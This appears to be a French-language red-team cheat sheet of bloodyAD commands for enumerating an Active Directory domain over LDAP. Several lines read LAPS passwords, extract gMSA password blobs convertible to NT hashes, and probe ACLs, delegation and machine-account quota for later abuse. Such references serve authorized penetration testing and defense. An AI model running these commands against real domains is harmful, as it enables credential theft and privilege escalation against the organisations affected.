bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get domainInfoDescription: SID du domaine, niveau fonctionnel, naming context, infos DC.
Information Gathering
Métadonnées domaine, objets modifiables, membres de groupes et secrets via LDAP.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get domainInfoDescription: SID du domaine, niveau fonctionnel, naming context, infos DC.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get writable --detailDescription: Objets et attributs modifiables par l'utilisateur courant : base de l'abus ACL.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Domain Admins'Description: Membres directs du groupe Domain Admins.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Enterprise Admins'Description: Enterprise Admins : critique dans un environnement multi-forêt.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$TARGET_USER' --attr memberOf,description,adminCountDescription: Détail d'un utilisateur : groupes, description (souvent password) et AdminSDHolder.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$TARGET_USER' --attr msDS-KeyCredentialLinkDescription: Vérifier si des shadow credentials existent déjà sur l'objet.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$COMPUTER$' --attr ms-Mcs-AdmPwdDescription: Lire le mot de passe LAPS si l'ACL le permet.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object '$GMSA$' --attr msDS-ManagedPasswordDescription: Extraire le blob de mot de passe gMSA, décodable en NT hash.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --attr msDS-AllowedToDelegateToDescription: Services ciblés pour la délégation constrained de chaque compte.
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get object 'DC=$DOMAIN' --attr ms-DS-MachineAccountQuotaDescription: Vérifier le MachineAccountQuota : si > 0, on peut créer des comptes machine.